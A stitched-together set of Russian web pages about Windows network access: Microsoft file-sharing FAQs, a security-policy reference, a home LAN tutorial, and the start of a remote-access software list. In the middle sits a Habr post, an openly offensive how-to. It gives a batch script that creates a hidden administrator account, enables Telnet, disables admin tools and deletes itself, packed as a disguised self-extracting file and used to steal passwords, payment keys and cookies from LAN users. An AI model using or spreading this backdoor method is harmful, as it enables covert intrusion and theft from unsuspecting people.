Доступ к компьютеру из сети


Предоставление общего доступа к файлам по сети в Windows

Вот несколько ответов на распространенные вопросы об изменениях, связанных с общим доступом к файлам и папкам в Windows 11:

Как теперь предоставлять общий доступ к файлам или папкам по сети?

Чтобы поделиться файлом или папкой по сети в проводнике, выполните следующее:

  1. Щелкните правой кнопкой мыши (или нажмите и удерживайте) файл, а затем выберите Показать дополнительные параметры Предоставить доступ> Конкретным пользователям.

  2. Выберите пользователя в сети для доступа к файлу или выберите Все, чтобы предоставить доступ к файлу всем пользователям сети.

Если выбрать одновременно несколько файлов, вы можете предоставить к ним общий доступ таким же образом. Эта функция работает и для папок: вы можете поделиться папкой, после чего общий доступ будет предоставлен ко всем файлам в ней.

Как отключить общий доступ к файлам или папкам?

Щелкните правой кнопкой мыши или выберите файл или папку, а затем нажмите Показать дополнительные параметры Предоставить доступ > Удалить доступ.

Почему параметр "Прекратить общий доступ" или "Удалить доступ" отображается в проводнике для файлов, к которым еще не предоставлен общий доступ?

В проводнике отображается параметр Удалить доступ для всех файлов, даже для тех, к которым не предоставляется общий доступ по сети.

Как узнать, к каким файлам или папкам предоставлен общий доступ по сети?

Откройте проводник и введите \\localhost в адресной строке.

Примечание: Если вы предоставили общий доступ к файлу из папки в профиле пользователя, то после перехода по адресу \\localhost вы увидите профиль пользователя и все связанные файлы. Это не означает, что ко всем вашим файлам предоставлен общий доступ. Просто у вас есть доступ ко всем собственным файлам.

Как включить сетевое обнаружение?

Если вы открываете проводник, переходите в раздел Сеть и видите сообщение об ошибке ("Сетевое обнаружение выключено…"), вам потребуется включить сетевое обнаружение, чтобы просмотреть устройства в сети, который предоставляют общий доступ к файлам. Чтобы включить эту функцию, выберите баннер Сетевое обнаружение выключено и нажмите Включить сетевое обнаружение и общий доступ к файлам.

Как устранить неполадки с общим доступом к файлам и папкам?

Для устранения неполадок, связанных с предоставлением общего доступа к файлам и папкам, выполните следующие действия на всех компьютерах, на которых вы хотите настроить общий доступ.

  • Обновление Windows. Обновление компьютеров до последней версии является ключом к тому, чтобы вы не пропустили ни одного драйвера или обновления Windows. 
    Открыть Центр обновления Windows

  • Убедитесь, что компьютеры находятся в одной сети. Например, если компьютеры подключаются к Интернету с помощью беспроводного маршрутизатора, убедитесь, что они подключены через один и тот же беспроводной маршрутизатор.

  • Если вы подключены к сети Wi-Fi, измените ее тип на Частная. Чтобы узнать, как это сделать, ознакомьтесь с разделом Общедоступные и частные сети Wi-Fi в Windows.

  • Включите сетевое обнаружение и общий доступ к файлам и принтерам, а затем отключите общий доступ с защитой паролем.

    1. Нажмите кнопку Пуск, а затем выберите Параметры .

    2. На панели поиска Найти параметр введите Управление дополнительными параметрами общего доступа и выберите Управление дополнительными параметрами общего доступа в предложенных результатах.

    3. В появившемся окне Дополнительные параметры общего доступа в разделе Частные выберите Включить сетевое обнаружение и Включить общий доступ к файлам и принтерам.

    4. В разделе Все сети выберите Отключить общий доступ с парольной защитой.

  • Включите автоматический запуск служб общего доступа.

    1. Нажмите клавишу Windows  + R.

    2. В диалоговом окне Выполнить введите services.msc и нажмите кнопку OK.

    3. Щелкните правой кнопкой мыши каждую из следующих служб, выберите Свойства. Если они не работают, щелкните Запустить и рядом с полем Тип запуска выберите Автоматически:

      • Узел поставщика функции обнаружения

      • Публикация ресурсов функции обнаружения

      • Обнаружение SSDP

      • Узел универсальных PNP-устройств

Статьи по теме

В Windows 10 изменились некоторые функции общего доступа к файлам и папкам по сети, в том числе удаление домашней группы. Узнайте ответы на часто задаваемые вопросы о других изменениях, связанных с доступом к файлам и папкам в Windows 10.

Как теперь предоставлять общий доступ к файлам или папкам по сети?

Для предоставления общего доступа к файлу или папке в проводнике выполните одно из следующих действий.

  • Щелкните правой кнопкой мыши или выберите файл и нажмите Предоставить доступ > Определенные пользователи.

  • Выделите файл, перейдите на вкладку Поделиться в верхней части проводника, а затем в разделе Поделиться с выберите Определенные пользователи.

Выберите пользователя в сети для доступа к файлу или выберите Все, чтобы предоставить доступ к файлу всем пользователям сети.

Если выбрать одновременно несколько файлов, вы можете предоставить к ним общий доступ таким же образом. Эта функция работает и для папок: вы можете поделиться папкой, после чего общий доступ будет предоставлен ко всем файлам в ней.

Как отключить общий доступ к файлам или папкам?

Для прекращения общего доступа в проводнике выполните одно из следующих действий.

  • Щелкните правой кнопкой мыши или выделите файл или папку, а затем выберите Предоставить доступ > Удалить доступ.

  • Выберите файл или папку, перейдите на вкладку Общий доступ в верхней части проводника, а затем в разделе Поделиться с выберите Удалить доступ.

Почему параметр "Прекратить общий доступ" или "Удалить доступ" отображается в проводнике для файлов, к которым еще не предоставлен общий доступ?

В проводнике отображается параметр Удалить доступ ("Прекратить общий доступ" в предыдущих версиях Windows 10) для всех файлов, даже для тех, к которым не предоставляется общий доступ по сети.

Как узнать, к каким файлам или папкам предоставлен общий доступ по сети?

Откройте проводник и введите \\localhost в адресной строке.

Примечание: Если вы предоставили общий доступ к файлу из папки в профиле пользователя, то после перехода по адресу \\localhost вы увидите профиль пользователя и все связанные файлы. Это не означает, что ко всем вашим файлам предоставлен общий доступ. Просто у вас есть доступ ко всем собственным файлам.

Как включить сетевое обнаружение?

Если вы открываете проводник, переходите в раздел Сеть и видите сообщение об ошибке ("Сетевое обнаружение выключено…"), вам потребуется включить сетевое обнаружение, чтобы просмотреть устройства в сети, который предоставляют общий доступ к файлам. Чтобы включить эту функцию, выберите баннер Сетевое обнаружение выключено и нажмите Включить сетевое обнаружение и общий доступ к файлам.

Как устранить неполадки с общим доступом к файлам и папкам?

Для устранения неполадок, связанных с предоставлением общего доступа к файлам и папкам, выполните следующие действия на всех компьютерах, на которых вы хотите настроить общий доступ.

  • Обновление Windows. Обновление компьютеров до последней версии является ключом к тому, чтобы вы не пропустили ни одного драйвера или обновления Windows. 
    Открыть Центр обновления Windows

  • Убедитесь, что компьютеры находятся в одной сети. Например, если компьютеры подключаются к Интернету с помощью беспроводного маршрутизатора, убедитесь, что они подключены через один и тот же беспроводной маршрутизатор.

  • Если вы подключены к сети Wi-Fi, измените ее тип на Частная. Чтобы узнать, как это сделать, ознакомьтесь с разделом Общедоступные и частные сети Wi-Fi в Windows.

  • Включите сетевое обнаружение и общий доступ к файлам и принтерам, а затем отключите общий доступ с защитой паролем.

    1. Нажмите кнопку Пуск , выберите Параметры  > Сеть и Интернет , а затем справа выберите Параметры общего доступа.

    2. В разделе Частные выберите Включить сетевое обнаружение и Включить общий доступ к файлам и принтерам.

    3. В разделе Все сети выберите Отключить общий доступ с парольной защитой.

  • Включите автоматический запуск служб общего доступа.

    1. Нажмите клавишу Windows  + R.

    2. В диалоговом окне Выполнить введите services.msc и нажмите кнопку OK.

    3. Щелкните правой кнопкой мыши каждую из следующих служб, выберите Свойства. Если они не работают, щелкните Запустить и рядом с полем Тип запуска выберите Автоматически:

      • Узел поставщика функции обнаружения

      • Публикация ресурсов функции обнаружения

      • Обнаружение SSDP

      • Узел универсальных PNP-устройств

Статьи по теме

Доступ к этому компьютеру из сети — параметр политики безопасности (Windows 10) - Windows security

  • Статья
  • Чтение занимает 5 мин
  • 1 участник

Были ли сведения на этой странице полезными?

Да Нет

Хотите оставить дополнительный отзыв?

Отзывы будут отправляться в корпорацию Майкрософт. Нажав кнопку "Отправить", вы разрешаете использовать свой отзыв для улучшения продуктов и служб Майкрософт. Политика конфиденциальности.

Отправить

В этой статье

Относится к:

  • Windows 10, Azure Stack HCI, Windows Server 2022, Windows Server 2019, Windows Server 2016

Описывает лучшие практики, расположение, значения, управление политикой и **** соображения безопасности для доступа к этому компьютеру из параметра политики безопасности сети.

Предупреждение

Если запущена Windows сервер или кластеризация HCI HCI Azure Stack, не удаляйте аутентификацию пользователей с компьютера Access на этом компьютере из параметра сетевой политики. Это может привести к неожиданному простою производства. Это связано с локальной учетной записью пользователя CLIUSR, которая используется для запуска кластерной службы. CLIUSR не входит в группу локальных администраторов, и если группа пользователей с проверкой подлинности удаляется, служба кластера не будет иметь достаточных прав для нормальной работы или запуска.

Справочники

Доступ к этому компьютеру из параметра сетевой политики определяет, какие пользователи могут подключаться к устройству из сети. Эта возможность требуется для ряда сетевых протоколов, в том числе протоколов на основе блока сообщений сервера (SMB),NetBIOS, общей файловой системы Интернета (CIFS) и компонентной объектной модели Plus (COM+).

Пользователи, устройства и учетные записи **** служб получают или теряют доступ к этому компьютеру от сетевого пользователя, будучи явно или неявно добавлены или удалены из группы безопасности, которая получила это право пользователя. Например, учетная запись пользователя или учетная запись компьютера может быть явно добавлена в настраиваемую группу безопасности или встроенную группу безопасности, или она может быть неявно добавлена Windows в компьютерную группу безопасности, такую как пользователи домена, пользователи с проверкой подлинности или контроллеры Enterprise домена. По умолчанию учетным записям пользователей и **** учетным записям машин предоставляется доступ к этому компьютеру от сетевого пользователя, если в объекте групповой политики по умолчанию определяются вычислительные группы, такие как пользователи с проверкой подлинности, а также контроллеры домена Enterprise контроллеры домена.

Константа: SeNetworkLogonRight

Возможные значения

  • Определяемый пользователей список учетных записей
  • Не определено

Рекомендации

  • На настольных устройствах или серверах-членах предоставлять это право только пользователям и администраторам.
  • В контроллерах домена это право предоставляется только пользователям, контроллерам корпоративных доменов и администраторам.
  • В кластерах с сбойными данными убедитесь, что это право предоставляется пользователям, удостоверившись в подлинности.
  • Этот параметр включает группу Everyone для обеспечения обратной совместимости. После Windows обновления после проверки правильной миграции всех пользователей и групп следует удалить группу **** Everyone и вместо этого использовать группу пользователей с проверкой подлинности.

Location

Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment

Значения по умолчанию

В следующей таблице перечислены фактические и эффективные значения политики по умолчанию для последних поддерживаемых версий Windows. Значения по умолчанию также можно найти на странице свойств политики.

Тип сервера GPO Значение по умолчанию
Политика домена по умолчанию Не определено
Политика контроллера домена по умолчанию Все, администраторы, пользователи с проверкой подлинности, Enterprise контроллеры домена, Windows 2000 совместимый доступ
Параметры по умолчанию отдельного сервера Все, администраторы, пользователи, операторы резервного копирования
Эффективные параметры контроллера домена по умолчанию Все, администраторы, пользователи с проверкой подлинности, Enterprise контроллеры домена, Windows 2000 совместимый доступ
Параметры сервера-участника по умолчанию Все, администраторы, пользователи, операторы резервного копирования
Параметры клиентского компьютера по умолчанию Все, администраторы, пользователи, операторы резервного копирования

Управление политикой

При изменении этого права пользователя при следующих действиях пользователи и службы могут испытывать проблемы с доступом к сети:

  • Удаление группы безопасности Enterprise контроллеров домена
  • Удаление группы пользователей с проверкой подлинности или явной группы, которая позволяет пользователям, компьютерам и учетным записям службы подключать пользователя к компьютерам по сети.
  • Удаление всех учетных записей пользователей и машин

Перезагрузка устройства не требуется для того, чтобы этот параметр политики был эффективным.

Изменения прав пользователя вступают в силу при его следующем входе в учетную запись.

Групповая политика

Параметры применяются в следующем порядке с помощью объекта групповой политики (GPO), который перезаписывал параметры на локальном компьютере при следующем обновлении групповой политики:

  1. Параметры локальной политики
  2. Параметры политики сайта
  3. Параметры политики домена
  4. Параметры политики подразделения

Когда локальный параметр серый, он указывает, что GPO в настоящее время контролирует этот параметр.

Вопросы безопасности

В этом разделе описывается, каким образом злоумышленник может использовать компонент или его конфигурацию, как реализовать меры противодействия, а также рассматриваются возможные отрицательные последствия их реализации.

Уязвимость

Пользователи, которые могут подключаться с устройства к сети, могут получать доступ к ресурсам на целевых устройствах, на которые у них есть разрешение. Например, для подключения пользователей к общим принтерам и папок требуется доступ к этому компьютеру с помощью права пользователя сети. Если это право пользователя назначено группе Everyone, любой пользователь в группе может прочитать файлы в этих общих папках. Такая ситуация маловероятна, поскольку группы, созданные по умолчанию установкой по крайней мере Windows Server 2008 R2 или Windows 7, не включают группу Everyone. Однако если устройство обновлено, а исходное устройство включает группу Everyone в составе определенных пользователей и групп, эта группа передается в рамках процесса обновления и присутствует на устройстве.

Противодействие

Ограничить доступ к этому компьютеру от сетевого пользователя правом только для тех пользователей и групп, которым требуется доступ к компьютеру. Например, если настроить этот параметр политики **** для **** групп Администраторы и Пользователи, пользователи, войдите в домен, смогут получать доступ к ресурсам, общим с **** серверов домена, если члены группы пользователей домена включены в локализованную группу пользователей. ****

Примечание Если вы используете IPsec для защиты сетевых коммуникаций в организации, убедитесь, что группе, которая включает учетные записи машин, будет предоставлено это право. Это право необходимо для успешной проверки подлинности компьютера. Назначение этого права **** пользователям или **** компьютерам домена соответствует этому требованию.

Возможное влияние

Если удалить доступ к этому компьютеру с сетевого пользователя прямо на контроллерах домена для всех пользователей, никто не сможет войти в домен или использовать сетевые ресурсы. Если удалить этот пользователь прямо на серверах-членах, пользователи не смогут подключаться к этим серверам через сеть. Если установлены необязательные компоненты, такие как ASP.NET или службы IIS (IIS), может потребоваться назначить это право пользователя дополнительным учетным записям, которые необходимы этим компонентам. Важно убедиться, что уполномоченным пользователям назначено право этого пользователя для устройств, которые им необходимы для доступа к сети.

Если запущена Windows или кластеризация неудачной работы HCI в Azure Stack, не удалять авторификацию пользователей с компьютера Access на этом компьютере из параметра сетевой политики. Это может привести к неожиданному простою производства. Это связано с локальной учетной записью пользователя CLIUSR, которая используется для запуска кластерной службы. CLIUSR не входит в группу локальных администраторов, и если группа пользователей с проверкой подлинности удалена, служба кластера не будет иметь достаточных прав для нормальной работы или запуска.

Статьи по теме

Назначение прав пользователя

параметры общего доступа и общий доступ к папке

Раньше я уже публиковал подробную инструкцию по настройке локальной сети в Windows 10. Но для настройки использовал домашнюю группу, которую из Windows 10 (в версии 1803 и выше) удалили. А это значит, что старая инструкция больше не актуальная, так как домашней группы в Windows 10 1803 больше нет. Но весь функционал конечно же сохранился, и в десятке по прежнему можно предоставить общий доступ к папкам и принтерам, открыть общий доступ к определенной папке, получить сетевой доступ к другим компьютерам и т. д. Так даже проще и лучше, убрали ненужные настройки. Домашняя группа использовалась для упрощения настройки локальной сети и предоставления общего доступа к файлам и принтерам. Но по факту, она только усложняла процесс настройки локальной сети своими запутанными настройками. Проще вручную открыть общий доступ и расшарить папку по сети, чем возиться с настройкой домашней группы.

Обычно локальную сеть настраивают между компьютерами, которые соединены между собой через роутер (по Wi-Fi, сетевому кабелю), или свитч. При необходимости можно соединить два компьютера напрямую с помощью сетевого кабеля, но этот способ вряд ли сейчас кто-то еще использует. Открыть общий доступ к папкам в Windows 10 можно не только для других компьютеров, но и для мобильных устройств. Например, доступ к расшаренным по сети папкам на компьютере можно получить с мобильных устройств, TV приставок и других устройств, которые работают на Android. Но чаще всего локальную сеть настраивают именно для обмена файлами между несколькими компьютерами. Если в сети есть компьютеры на Windows 7 и Windows 8, то на них параметры общего доступа настраиваются практически так же, как и в Windows 10. Папка, к которой открыт общий доступ на компьютере с Windows 10 будет без проблем отображаться в сетевом окружении на компьютере с Windows 7 и наоборот. Главное, чтобы на обеих компьютерах было включено сетевое обнаружение.

Подготовка к настройке локальной сети в Windows 10

При подключении к роутеру по кабелю, или по Wi-Fi сети, Windows 10 присваивает подключению сетевой профиль: "Общедоступные" или "Частные". Здесь все просто. "Общедоступные" – это когда компьютер подключен к общедоступной, чужой сети. Например, где-то в кафе, отеле, у знакомых дома и т. д. "Частные" – это подключение к домашней сети. Этот профиль желательно устанавливать только в том случае, когда вы подключены к своей сети (к своему роутеру, который надежно защищен. Смотрите статью максимальная защита Wi-Fi сети и роутера от других пользователей и взлома). В зависимости от выбранного профиля, меняются некоторые настройки общего доступа и брандмауэра.

Для настройки локальной сети я рекомендую для Ethernet или Wi-Fi подключения установить сетевой профиль "Частные". Ну и соответственно открывать общий доступ к файлам только в тех сетях, которым вы доверяете (которые вы контролируете). На тему смены сетевого профиля я уже писал подробную инструкцию: домашняя (частная) и общественная (общедоступная) сеть Windows 10.

Сделать это не сложно. В свойствах Ethernet подключения:

В свойствах Wi-Fi сети:

Необходимый сетевой профиль подключению присвоили, можно переходить к настройке локальной сети.

Настройка параметров общего доступа в Windows 10

Нам нужно открыть окно "Дополнительные параметры общего доступа". Это можно сделать через "Центр управления сетями и общим доступом", или в параметрах, в разделе "Сеть и Интернет" – "Параметры общего доступа".

Для профиля "Частная (текущий профиль)" нам нужно установить такие настройки:

  1. Включить сетевое обнаружение – если сетевое обнаружение включено, то наш компьютер будет видеть другие компьютеры в сети, и будет виден другим компьютерам.
  2. Включить общий доступ к файлам и принтерам – после включения все папки и принтеры к которым разрешен общий доступ будут доступны другим устройствам в этой локальной сети. По умолчанию это стандартные общие папки (Общая музыка, Общие документы, Общие видеозаписи и т. д.). Дальше в статье я покажу, как открыть общий доступ к любой папке на вашем компьютере.

Так же меняем следующие настройки для профиля "Все сети":

  1. Включить общий доступ, чтобы сетевые пользователи могли читать и записывать файлы в общих папках.
  2. Отключить общий доступ с парольной защитой. Что касается общего доступа с парольной защитой или без, то разница в том, нужно ли вводить пароль при доступе к общей папке на данном компьютере. В домашней сети, как правило, пароль не нужен. Но если есть необходимость, вы можете оставить парольную защиту. Тогда на других компьютерах будет появляться запрос имени пользователя и пароля (пользователя удаленного компьютера).

Обязательно нажимаем на кнопку "Сохранить изменения"!

Все! Настройка локальной сети в Windows 10 завершена.

Доступ к общим папкам с другого компьютера в локальной сети

После настройки общего доступа мы можем получить доступ к общим папкам с других компьютеров, которые находятся в одной сети (подключены через один роутер или свитч).

На других компьютерах желательно выполнить такие же настройки общего доступа, как я показывал выше. Если вы это сделаете, то в проводнике на вкладке "Сеть" сразу появится компьютер из сетевого окружения. В противном случае сетевое обнаружение придется включать с самом проводнике (скриншоты ниже).

Можно сразу перейти в проводник, на вкладку "Сеть". Если сетевое обнаружение на этом компьютере отключено, то вы увидите сообщение: "Сетевое обнаружение отключено. Сетевые компьютеры и устройства не видны".

Нажимаем "OK" и сверху появится желтая полоска, где можно "Включить сетевое обнаружение и общий доступ к файлам".

А если сети, к которой вы подключены присвоен статус "Общедоступные", то появится еще одно окно. Выберите следующий пункт: "Нет, сделать сеть, к которой подключен этот компьютер, частной".

После этого на вкладке "Сеть" в проводнике сразу появляться "Компьютеры". Наш компьютер так же будет отображаться вместе с другими компьютерами из локальной сети.

Все готово!

Мы только что настроили локальную сеть между двумя компьютерами на Windows 10. С обеих компьютеров есть доступ друг к другу по сети (в моем случае по Wi-Fi, через роутер). По умолчанию доступ открыт только к отдельным общим папкам. Для обмена файлами между компьютерами можно использовать эти папки (копировать в них файлы, просматривать, удалять), либо же вручную открыть общий доступ к другим папкам, которые находятся на жестком диске компьютера. Дальше я более подробно покажу, как расшарить папку в Windows 10.

Как открыть общий доступ к папке в Windows 10?

В Windows 10 предоставить общий доступ к файлу или папке (расшарить папку) можно буквально за несколько секунд. Еще я покажу, как закрыть общий доступ к папке/файлу и посмотреть, к каким папкам предоставлен общий доступ.

Просто нажимаем правой кнопкой мыши на любую папку или файл, наводим курсор на меню "Предоставить доступ к" и выбираем "Отдельные люди".

Дальше нужно выбрать пользователя, для которого будет предоставлен общий доступ к папке. В домашней сети можно выбрать "Все". В таком случае доступ к файлу/папке будет у всех участников сети. Можно создать нового пользователя и использовать его имя/пароль для доступа к папке с других компьютеров (если вы не отключали общий доступ с парольной защитой).

Для пользователя "Все", (или нового пользователя) можно изменить права доступа к файлу или папке в Windows 10. По умолчанию папка/файл доступен только для чтения. Можно установить "Чтение и запись". Тогда другие пользователи по сети смогут менять/удалять файлы в папке, записывать новые, редактировать файлы.

После нажатия на кнопку "Поделиться" появится окно, в котором будет указан сетевой адрес к файлу, или папке. Это адрес можно скопировать и использовать для доступа к данному ресурсу с других компьютеров в локальной сети (просто перейти по адресу в проводнике).

Чтобы зайти в папку, к которой мы открыли общий доступ не обязательно использовать адрес. На другом компьютере можно просто перейти в раздел "Сеть" в проводнике Windows. Открываем нужный компьютер из нашей локальной сети и переходим в общую папку, к которой мы только что открыли доступ.

Так как я установил для этой папки права на чтение и запись, то без проблем могу редактировать, удалять и создавать новые файлы в этой папке. Права применяются ко всем файлам в расшаренной папке.

Как отключить общий доступ к папке или файлу в Windows 10?

Просто нажимаем на папку или файл правой кнопкой мыши, выбираем "Предоставить доступ к" и нажимаем на "Сделать недоступными".

Вот так просто в Windows 10 можно закрыть общий доступ к папке/файлу.

Обратите внимание, что пункт "Сделать недоступными" ("Закрыть доступ", "Отключить общий доступ") отображается в свойствах любой папки, даже к которой не открыт общий доступ. Так и должно быть.

Как посмотреть все папки и файлы, к которым открыт общий доступ на компьютере?

Для этого нужно в проводнике перейти по адресу \\localhost

Откроется папка, в которой будут отражаться другие папки и файлы, к которым на данном компьютере открыт общий доступ.

Послесловие

Для меня, как и наверное для многих, локальная сеть, это всегда было что-то сложное и непонятное. Вроде понимаешь для чего она нужна и как ею можно пользоваться, но не совсем понятно, как она работает и как ее настроить. Какие-то непонятные и запутанные параметры, общий доступ, права, учетные записи и т. д., но если во всем разобраться, а еще лучше самостоятельно настроить, то сразу понимаешь, что в этом нет ничего сложного. Даже без этой домашней группы, которую убрали в Windows 10 1803 все можно без проблем настроить и использовать общий доступ к файлам, папкам и принтерам в локальной сети.

Обновление: подготовил инструкцию по подключению и настройке сетевого принтера в Windows 10.

Оставляйте свои комментарии, вопросы и дополнения. Если я что-то забыл, или написал не так – поделитесь полезной информацией в комментариях! С удовольствием отредактирую и дополню статью.

Простейший скрытый способ получить доступ к нужному ПК из домашней сети / Хабр

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно

здесь

) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть.

Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCU\SOFTWARE\POLICIES\Microsoft\MMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat

1. Echo off (думаю всем понятно, объяснять не стоит).

2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.

3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.

4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.

5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».

6. Sc start TlntSvr >nul Стартуем службу телнет.

7.Reg add “HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).

8. Reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).

9. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\MMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%\system32\compmgmt.msc >nul
Удаляем mmc (Не обязательный параметр).

10. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\windows\System” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)

11. Del Start_game.bat Удаляем сам батник.

Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat

Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.

З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.

(Делать можно необязательно exe файл можно создать и другие типы файлов).

Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.

Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.

При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.

З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.

http://www.youtube.com/watch?v=X5GD4Iu91CU&feature=g-upl&context=G2c89d80AUAAAAAAAAAA

10 бесплатных программ для удалённого доступа к компьютеру

Перечисленные программы позволяют контролировать ПК с других компьютеров или мобильных устройств через интернет. Получив удалённый доступ к устройству, вы сможете управлять им так, будто оно находится рядом: менять настройки, запускать установленные приложения, просматривать, редактировать и копировать файлы.

В статье вы увидите такие термины, как «клиент» и «сервер».

Клиент — это любое устройство (ПК, планшет или смартфон), а сервер — удалённый компьютер, к которому оно подключается.

1. Удалённый помощник (Microsoft Remote Assistance)

  • К каким платформам можно подключаться: Windows.
  • С каких платформ возможно подключение: Windows.

«Удалённый помощник» — встроенная в Windows утилита, благодаря которой можно быстро подключать компьютеры друг к другу без сторонних программ. Этот способ не позволяет обмениваться файлами. Но к вашим услугам полный доступ к удалённому компьютеру, возможность совместной работы с другим пользователем и текстовый чат.

Инструкция для сервера

  1. Запустите утилиту. Для этого наберите в поиске по системе «Удалённый помощник». Если у вас Windows 10, ищите по запросу MsrA. Кликните правой кнопкой мыши по найденному элементу и выберите «Запуск от имени администратора».
  2. В открывшемся окне щёлкните «Пригласить того, кому вы доверяете, для оказания помощи». Если система сообщит, что компьютер не настроен, нажмите «Исправить» и следуйте подсказкам. Возможно, после изменения настроек придётся перезапустить утилиту.
  3. Когда помощник предложит выбрать способ приглашения, кликните «Сохранить приглашение как файл». Затем введите его название, папку хранения и подтвердите создание файла.
  4. Когда файл появится в указанном месте, на экране отобразится окно с паролем. Скопируйте пароль и отправьте его вместе с файлом клиенту по почте или любым другим способом.
  5. Дождитесь запроса на подключение от клиента и одобрите его.

Инструкция для клиента

  1. Откройте файл, созданный сервером, и введите полученный пароль. После этого вы увидите экран удалённого компьютера и сможете наблюдать за ним в специальном окне.
  2. Чтобы управлять файлами и программами чужого компьютера так, будто вы находитесь рядом с ним, кликните в верхнем меню «Запросить управление» и дождитесь ответа от сервера.

Файл и пароль являются одноразовыми, для следующего сеанса они уже не подойдут.

2. Удалённый рабочий стол (Microsoft Remote Desktop)

  • К каким платформам можно подключаться: Windows (только в редакциях Professional, Enterprise и Ultimate).
  • С каких платформ возможно подключение: Windows, macOS, Android и iOS.

Это средство представляет собой ещё одну встроенную в Windows программу, предназначенную для удалённого доступа. От предыдущей она отличается прежде всего тем, что выступающий сервером компьютер нельзя использовать во время подключения: его экран автоматически блокируется до конца сеанса.

